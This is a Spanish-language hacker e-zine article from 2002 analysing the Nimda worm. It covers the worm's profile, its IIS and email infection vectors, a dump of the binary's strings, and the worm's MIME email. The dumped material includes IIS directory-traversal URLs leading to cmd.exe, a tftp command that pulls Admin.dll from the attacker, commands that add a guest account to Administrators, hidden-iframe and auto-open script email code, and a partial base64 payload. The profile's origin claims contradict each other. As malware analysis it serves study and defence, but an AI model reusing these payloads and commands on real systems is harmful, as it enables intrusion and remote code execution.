Acid Klan nº4:(4.11.txt):12/03/2002 << Back To Acid Klan nº 4

<< Prev file: 4.10.txt

Next file: 4.2.txt >>

[11]--------------------[NIMDA virus Analisis]-------------------------[11] ||ACENTOS RETIRADOS PARA LECTURA MAS RAPIDA DEL INTERPRETE DE COMANDOS|| ||SE VE MEJOR EN UN EDITOR DE SHELL|| ::::::::::NIMDA LA NUEVA AMENAZA:::::::::: by Anthrax INDEX: 01.-[INTRODUCCION] Introduccion al analisis completo 02.-[PERFIL] Biografia del virus 03.-[PERFIL DE ANALISIS] Maquina infectada y maquina en la que se analizo 04.-[DETALLES DE INFECCION] Como nimda, Ataca. 05.-[ANALISIS A FONDO DEL VIRUS] Analisis del virus total +STRINGS PRIMARIOS +STRINGS IMPORTANTES 06.-[EL EMAIL] EL email que se genera y se autopropaga 07.-[ANALISIS HEXADECIMAL] Analisis Hexadecimal del virus 08.-[VIRUS SOURCE CODE] El source code del analisis mediante un debugger [DEBUGGER SOURCE] 09.-[PROFILAXIS Y ERRADICACION] Como evitar la propagacion, asi como si ya estamos infectados, limpieza de la maquina infectada. 10.-[OPINION PERSONAL] Que opinamos del virus. 11.-[AGRADECIMIENTOS] Personas que colaboraron 12.-[DESPEDIDA] Despedida [INTRODUCCION] Cuando hablamos de un gusano [worm] nos viene a la mente una manzana roida por ese peque±o e insignificante ente... Pero en terminos computacionales cuando hablamos de un gusano nos viene a la mente un programa que se reproduce por si mismo y que puede colapsar nuestro sistema completamente. Ultimamente estos, estan de moda... Recuerdan MELISA, LOVE_LETTER.... o el famosisimo SIRCAM, pues ahora a la red hace arribo un nuevo gusano, parecido a RED Y BLUE CODE, pero aun mas desastroso y brutal, su nombre Nimda [W32.Nimda.A@mm.Worm], su principal forma de propagacion es como en la mayoria de los worms, el servicio de mail pero este tiene una variante, se ayuda tambien de codigos unicodex y msdac access explotables en sistemas windows NT 2k, no parchados, Con esto tenemos una cruza entre SIRCAM y [RED o BLUE CODE]... Realmente mortifera. [PERFIL] Nombre:Nimda Worm Data Name: W32.Nimda.A@mm W32.Nimda Worm.Nimda.mm W32.Nimda.A@mm.Worm Peligrosidad: Hasta el momento 4 Sistema de Propagacion:via e-Mail y vulnerabilidades en sistemas ISS [WindowsNT] visitando una web infectada o con el virus. Sistema de Seguimiento de errores: CRIP 59 Lenguaje: C probablemente, HLL Sources Creador: DESCONOCIDO, pero alguien de la republica popular de china Pais de Aparici≤n: Probablemente se origino en la parte norte de europa [noruega, finlandia, o la parte norte de rusia.] Programado por: Concept Virus(CV) V.5, Copyright(C)2001 R.P.China Fecha de aparici≤n: 16-17 de septiembre de 2001 Infecciones reportadas: Symantec Workstation mas de 3000, Servers mas de 100 AVP Workstation mas de 2500, Servers mas de 80 Panda Workstation mas de 2800, Servers mas de 250 Cosas Nuevas o Raras: De los pocos virus que se tienen manera de infeccion via Webpage, si no es que el unico de su clase. [PERFIL DE ANALISIS] Maquina: FreeBSD 4.2-STABLE i386 Procesador: 486 Hexadecimal Editor Maquina Infectada: Windows NT 4 ISS 5.0 [DETALLES DE INFECCION] Nimda utiliza muchos medios de auto propagacion entre los que estan, su auto envio por mail, busqueda de compartimiendo de archivos e impresoras via NETBIOS en LAN, busqueda de archivos e impresoras via NETBIOS en internet, ademas de la nombradisima busqueda de vulnerabilidades IIS [unicode and decode], este se aloja posteriormente en archivos de boot y archivos de dispositivos remotos. ┐Pero como actua o que hace? Se comienza la infeccion al abrir el archivo README.EXE ( Readme.exe no se ve en el atachment, con esto inicia su fase de enmascarado. ┐Con que se auto-envia? Con la directriz y servicio llamado mapi, este viene enmascarado con la entrada CRIP 59. ┐Que archivos Da±a? El que este a su paso y los sobre escribe con el mismo. ┐Cuanto pesa el virus? Aproximadamente 57344 bites ┐De que vulnerabilidades del ISS se aprovecha? +UNICODE STRINGS '/scripts/..%255c..' '/_vti_bin/..%255c../..%255c../..%255c..' '/_mem_bin/..%255c../..%255c../..%255c..' '/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%' '/scripts/..%c1%1c..' '/scripts/..%c0%2f..' '/scripts/..%c0%af..' '/scripts/..%c1%9c..' '/scripts/..%%35%63..' '/scripts/..%%35c..' '/scripts/..%25%35%63..' '/scripts/..%252f..' +Microsoft IIS File Permission Canonicalization Vulnerability http://www.securityfocus.com/bid/1565 +Microsoft IIS/PWS Escaped Characters Decoding Command Execution Vulnerability http://www.securityfocus.com/bid/1806 +Microsoft IE MIME Header Attachment Execution Vulnerability http://www.securityfocus.com/bid/2524 +Microsoft IIS and PWS Extended Unicode Directory Traversal Vulnerability http://www.securityfocus.com/bid/2708 +Microsoft Index Server and Indexing Service ISAPI Extension Buffer Overflow Vulnerability http://www.securityfocus.com/bid/2880 [ANALISIS A FONDO DEL VIRUS] +STRINGS PRIMARIOS ######INICIA###### SVW3 WPWW 6VWh X_^[ 6SVWj _^[u _^[] GGCC GGCC PSh? SSSh VSSS PSSh@ PSSh@ j@PW X[_^ jcY; 6y.VW 6j@h PQPW Pj@VSW PVSSW 6SSW 6_^3 SUVW 6_^]3 6WPWSh WPWSh WPWSh 6VWS 6SShP 6VWS 6SSh0 6VWS 6SSh 6VWS 6SSh 6VWS SPh| 6_^[ ;H(}Rh ;A(}X t0A; 6_^[ SVWhD GY;~ 9~ v GY;~ r QSPh 6PSj X_^[ PVVh X_^] SUVW _^][Y SVWj X_^[ SVW3 Ph~f VPVV Ph~f jc^W X_^[ D$<UP D$@hx D$`QPV D$@P D$@h D$@h D$@h D$@h D$@h D$@h D$@h D$@P D$@P _]Vj @SVW j@P3 C98u |$$3 D$8WP D$Dj D$\PWh0 D$\P D$\h( D$`YWPh D$\h D$\WP l$4u D$0j 9T$,u<; D$ ; u>9T$ u89T$ u89T$ D$\P F9T$ 29T$ 9T$ t D$(u D$\P L$8j QUPS D$\P t$(j l$,UWjfj D$\P D$\P D$TP D$HP D$TPU D$ph D$TP D$HP D$TPU D$`VP D$\P _^][ YuOV X_^[ SVWht PSh0 YYSj&j ^VSP 6SSSSS X_^[ 6j.V QQSV3 6VVj X_^[ SUVW t$@V !SSj _^][ 6Wh ( 6YWV 6t\h 6tUh( 6tyh WVVV 6_^[ PVh? VVVh8 PVVh PVh? WPWVh WPWVh 6_^[ X_^[ PSh? SSSh PSSV PWSV PWSV PWSh 6^9] 6_[t D$@P D$@hx D$`QPV D$@P D$@h D$@h Yu:W D$`QPV WSSj t7SV SQWPV <{}%<-~!</t <`t <@ufj 6VuD 6YPS 6j.V >Su" th;Y sa >Su5 ^[WWW 6Wt| SPSS QSUV3 6uQUPP 6ubht X_^][Y 6YSV PVh0 _WVP PVVVVV X_^[ SVh0 YYVSh t_VVh tE95 PSh0 D$ SPh D$ UP D$ SP 6VSh0 6SUj D$ P D$ VP D$$YP 6SUj YPVW X_^][ SUVW 6WUV dWUV D$`QPV X_^][ X_^[ _WVP PVVVVV Yj&P X_^[ ^@[_ 6j?P PPh,o QSPh SVWj VPVV VPVV 6_^3 6u?h t WVS NWVS u7WPS u&WVS _^[] strncpy memset strcpy strlen strtok memcpy strchr strcat rand strcmp _strlwr strncat srand free sprintf malloc atoi strstr strrchr MSVCRT.dll _initterm _adjust_fdiv GetCurrentThreadId CloseHandle WriteFile SetFilePointer CreateFileA MoveFileExA ReadFile SetFileAttributesA FindClose FindNextFileA FindFirstFileA WriteProcessMemory OpenProcess GetCurrentProcessId lstrcmpiA HeapCompact Sleep GetTickCount SetThreadPriority GetCurrentThread CreateMutexA lstrcpyA GetComputerNameA LocalFree lstrlenA LocalAlloc CreateThread ReleaseMutex WaitForSingleObject GetDriveTypeA GetLogicalDrives GetFileSize CopyFileA GetFileAttributesA SetFileTime GetFileTime EndUpdateResourceA UpdateResourceA SizeofResource LockResource LoadResource FindResourceA FreeLibrary BeginUpdateResourceA LoadLibraryExA DeleteFileA GetTempFileNameA CreateProcessA GetModuleFileNameA GetCurrentDirectoryA GetCommandLineA GetTempPathA GetSystemDirectoryA GetWindowsDirectoryA GetModuleHandleA GetVersionExA GetProcAddress LoadLibraryA GetSystemTime ExitProcess HeapDestroy GetLastError HeapCreate WritePrivateProfileStringA KERNEL32.dll RegCloseKey RegQueryValueExA RegOpenKeyExA RegEnumKeyExA RegCreateKeyExA RegDeleteKeyA RegEnumValueA RegSetValueExA RegQueryValueA ADVAPI32.dll System\CurrentControlSet\Services\VxD\MSTCP NameServer SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\ SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces Concept Virus(CV) V.5, Copyright(C)2001 R.P.China MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="====_ABC1234567890DEF_====" X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 --====_ABC1234567890DEF_==== Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_====" --====_ABC0987654321DEF_==== Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <HTML><HEAD></HEAD><BODY bgColor=3D#ffffff> <iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0> </iframe></BODY></HTML> --====_ABC0987654321DEF_====-- --====_ABC1234567890DEF_==== Content-Type: audio/x-wav; name="readme.exe" Content-Transfer-Encoding: base64 Content-ID: <EA4DMGBP9p> --====_ABC1234567890DEF_==== NUL= [rename] \wininit.ini Personal Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders \*.* EXPLORER fsdhqherwqi2001 SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security share c$=c:\ user guest "" localgroup Administrators guest /add localgroup Guests guest /add user guest /active open user guest /add HideFileExt ShowSuperHidden Hidden Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced \\%s %ld %ld %ld %ld %ld Image Space Exec Write Copy Image Space Exec Read/Write Image Space Exec Read Only Image Space Executable Image Space Write Copy Image Space Read/Write Image Space Read Only Image Space No Access Mapped Space Exec Write Copy Mapped Space Exec Read/Write Mapped Space Exec Read Only Mapped Space Executable Mapped Space Write Copy Mapped Space Read/Write Mapped Space Read Only Mapped Space No Access Reserved Space Exec Write Copy Reserved Space Exec Read/Write Reserved Space Exec Read Only Reserved Space Executable Reserved Space Write Copy Reserved Space Read/Write Reserved Space Read Only Reserved Space No Access Process Address Space Exec Write Copy Exec Read/Write Exec Read Only Executable Write Copy Read/Write Read Only No Access Image User PC Thread Details ID Thread Priority Current Context Switches/sec Start Address Thread Page Faults/sec Virtual Bytes Peak Virtual Bytes Private Bytes ID Process Elapsed Time Priority Base Working Set Peak Working Set % User Time % Privileged Time % Processor Time Process Counter 009 software\microsoft\windows nt\currentversion\perflib\009 Counters Version Last Counter software\microsoft\windows nt\currentversion\perflib /scripts /MSADC /scripts/..%255c.. /_vti_bin/..%255c../..%255c../..%255c.. /_mem_bin/..%255c../..%255c../..%255c.. /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c.. /scripts/..%c1%1c.. /scripts/..%c0%2f.. /scripts/..%c0%af.. /scripts/..%c1%9c.. /scripts/..%%35%63.. /scripts/..%%35c.. /scripts/..%25%35%63.. /scripts/..%252f.. /root.exe?/c+ /winnt/system32/cmd.exe?/c+ net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest" tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20 Admin.dll c:\Admin.dll d:\Admin.dll e:\Admin.dll <html><script language="JavaScript">window.open("readme.eml", null, "resizable=n o,top=6000,left=6000")</script></html> /Admin.dll GET %s HTTP/1.0 Host: www Connnection: close readme main index default html .asp .htm \readme.eml .exe winzip32.exe riched20.dll .nws .eml .doc .exe dontrunold ioctlsocket gethostbyname gethostname inet_ntoa inet_addr ntohl htonl ntohs htons closesocket select sendto send recvfrom recv bind connect socket __WSAFDIsSet WSACleanup WSAStartup ws2_32.dll MAPILogoff MAPISendMail MAPIFreeBuffer MAPIReadMail MAPIFindNext MAPIResolveName MAPILogon MAPI32.DLL WNetAddConnection2A WNetCancelConnection2A WNetOpenEnumA WNetEnumResourceA WNetCloseEnum MPR.DLL ShellExecuteA SHELL32.DLL RegisterServiceProcess VirtualFreeEx VirtualQueryEx VirtualAllocEx VirtualProtectEx CreateRemoteThread HeapCompact HeapFree HeapAlloc HeapDestroy HeapCreate KERNEL32.DLL SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\ SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths Type Remark SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\X$ Parm2enc Parm1enc Flags Path SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\ SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan SYSTEM\CurrentControlSet\Services\lanmanserver\Shares Cache Software\Microsoft\Windows\CurrentVersion\Explorer\MapMail QUIT Subject: From: < DATA RCPT TO: < MAIL FROM: < HELO aabbcc -dontrunold NULL \readme*.exe admin.dll qusery9bnow -qusery9bnow \mmc.exe \riched20.dll boot Shell explorer.exe load.exe -dontrunold \system.ini \load.exe octet wwwwwp pwlo wwww wwwwwwwwwwx wwwwwwx wwwwx wwwx lffffff ffff ffff CCCCCC CCCCCCCCC NPAD PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX %0C0Q0_0m0 1&1g1 2i2s2 2I3V3d3s3 6Y6~6 7.7H7{7 8>8J8`8e8 9!9@9W9 :!:[:d:o: ;O;U;k; <&=2=8=E=O=^=j= >">)>.>E>^> ?)?0?5?@?M?T?]?|? 0'0/0C0 1!1*111:1A1J1Y1q1v1}1 1'2K2 3-343S3a3 4.494?4Q4Y4c4o4u4|4 5,515D5I5Z5_5p5u5 6,616D6I6Y6^6o6 7&7+7>7C7S7X7h7m7}7 8(8-8@8E8U8Z8j8o8 9*9/9B9G9W9\9l9q9 : ;8;A;_;h;v; <T<d< >2>U>~> ?!?(?/?Q?X?q? 0'030?0X0}0 2<2W2t2 203I3k3~3 4+464B4U4{4 5,5>5P5b5q5 5.646H6g6n6}6 7?7Q7V7 8!8-8:8F8L8q8 929D9O9T9Z9m9v9 <5<?<M<`<f<y< =2=O=h= >">,>@>Q>W>i>v> ?&?6?W?u? 0.0;0R0v0 02171=1Q1W1d1o1v1 2+20262A2U2`2 2.3?3V3\3k3 4$494K4a4v4 5.575J5P5u5{5 6F6k6 777}7 8-848A8N8g8w8 9 9(9-9<9D9P9X9d9l9y9 9":3:=:B:K:W:\:d:i:o:v:{: ;#;(;1;?;G;L;U;\;d;i;o;v;{; <#<(<.<5<:<C<N<V<[<a<h<m<s<z< =!='=.=3=9=@=E=K=R=W=]=d=i=o=v={= >.>J>v> ?.?J?\?m? :0E0Z0x0 1)1D1{1 2&272M2d2 4!4*4@4F4O4 5-5B5R5[5o5y5 6&6I6S6e6 707b7 8%8:8E8R8 9*979P9p9 :7:=:F:N:X:a:m:u:|: ;;;L;o; <N<Y<k< =N=y= >+>1>Q>^>f>l>w> ?5?>?W?_?p? 141N1W1 1b2{2 3.3^3d3k3 41474B4H4V4^4e4j4p4 5)5>5F5R5Z5i5v5|5 6!6n6 7 7)757X7m7x7 8;8F8K8R8W8]8c8 9 9F9L9[9d9v9 ;(;8;>;m; <!<.<9<@<_<q< =+=1=y= >V>\>r>x> ?#?;?B?M?T?z? 0v0~0 1 1'141K1d1j1~1 1#2B2`2t2 3%373I3t3{3 4 4+484@4N4S4X4]4h4u4 465R5 ######TERMINA###### Pero aqui hay bastante basura..... Que nos interesa de el virus????.....A aqui una peque±a parte de lo interesante... 1.- +Concept Virus(CV) V.5, Copyright(C)2001 R.P.China ESTO NOS REVELA QUE FUE DESARROLLADO EN LA REPUBLICA POPULAR DE CHINA 2.- /scripts --- unicode exploits /MSADC /scripts/..%255c.. /_vti_bin/..%255c../..%255c../..%255c.. /_mem_bin/..%255c../..%255c../..%255c.. /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c.. /scripts/..%c1%1c.. /scripts/..%c0%2f.. /scripts/..%c0%af.. /scripts/..%c1%9c.. /scripts/..%%35%63.. /scripts/..%%35c.. /scripts/..%25%35%63.. /scripts/..%252f.. /root.exe?/c+ /winnt/system32/cmd.exe?/c+ net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest" tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20 --- Tftp, <html><script language="JavaScript">window.open("readme.eml", null, " resizable=no,top=6000,left=6000")</script></html> EXPLOITS UNICODE DECODE Y MSDAC UTILIZADAS 3.- MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="====_ABC1234567890DEF_====" X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 --====_ABC1234567890DEF_==== Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_====" --====_ABC0987654321DEF_==== Content-Type: text/html; charset="iso-8859-1" ----------- Standard Charset pitty Content-Transfer-Encoding: quoted-printable <HTML><HEAD></HEAD><BODY bgColor=3D#ffffff> <iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0> </iframe></BODY></HTML> --====_ABC0987654321DEF_====-- --====_ABC1234567890DEF_==== Content-Type: audio/x-wav; name="readme.exe" Content-Transfer-Encoding: base64 Content-ID: <EA4DMGBP9p> --====_ABC1234567890DEF_==== MIME TYPES AND HEADERS 4.- share c$=c:\ user guest "" localgroup Administrators guest /add localgroup Guests guest /add user guest /active open user guest /add USUARIOS A ATACAR DEVASTAR Y ADQUISICION DE PERMISOS. 5.- \readme*.exe admin.dll qusery9bnow -qusery9bnow \mmc.exe \riched20.dll boot Shell explorer.exe load.exe -dontrunold \system.ini \load.exe COPIADO REPRODUCCION E INDUCCION DE EL VIRUS [EL EMAIL] #################################INICIA################################# This is a multi-part message in MIME format. --------------9320CF73DE613805C122C17B Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit --------------9320CF73DE613805C122C17B Content-Type: text/html; charset=koi8-r; name="index.html" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="index.html" <html><body bgcolor=black><br><br><br><br><br><br><table width=100%><td><p align ="center"><font size=7 color=red>fuck USA Government</font><tr><td><p align="cen ter"><font size=7 color=red>fuck PoizonBOx<tr><td><p align="center"><font size=4 color=red>contact:sysadmcn@yahoo.com.cn</html> <html><script language="JavaScript">window.open("readme.eml", null, "resizable=n o,top=6000,left=6000")</script></html> --------------9320CF73DE613805C122C17B Content-Type: text/html; charset=koi8-r; name="readme.eml" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="readme.eml" MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="====_ABC1234567890DEF_====" X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 --====_ABC1234567890DEF_==== Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_====" --====_ABC0987654321DEF_==== Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <HTML><HEAD></HEAD><BODY bgColor=3D#ffffff> <iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0> </iframe></BODY></HTML> --====_ABC0987654321DEF_====-- --====_ABC1234567890DEF_==== Content-Type: audio/x-wav; name="readme.exe" Content-Transfer-Encoding: base64 Content-ID: <EA4DMGBP9p> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJmqSzxytU88cbVO PBG1TzyZqkQ8fbVPPMmzSTxwtU88UmljaHG1TzwAAAAAAAAAAMF4gtYAAAB/UEUAAEwBBQB1Oqc7 AAAAAAAAAADgAA4BCwEGAABwAAAAYAAAAAAAALN0AAAAEAAAAIAAAAAAFzYAEAAAABAAAAQAAAAA AAAABAAAAAAAAAAAEAEAABAAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAA AACEgQAAUAAAAADgAACIHgAAAAAAAAAAAAAAAAAAAAAAAAAAAQA4CgAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAIQBAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAudGV4dAAAAFZlAAAAEAAAAHAAAAAQAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAAAq CQAAAIAAAAAQAAAAgAAAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAAKEcAAACQAAAAIAAAAJAAAAAA AAAAAAAAAAAAAEAAAMAucnNyYwAAAAAgAAAA4AAAACAAAACwAAAAAAAAAAAAAAAAAABAAABALnJl bG9jAABGCwAAAAABAAAQAAAA0AAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 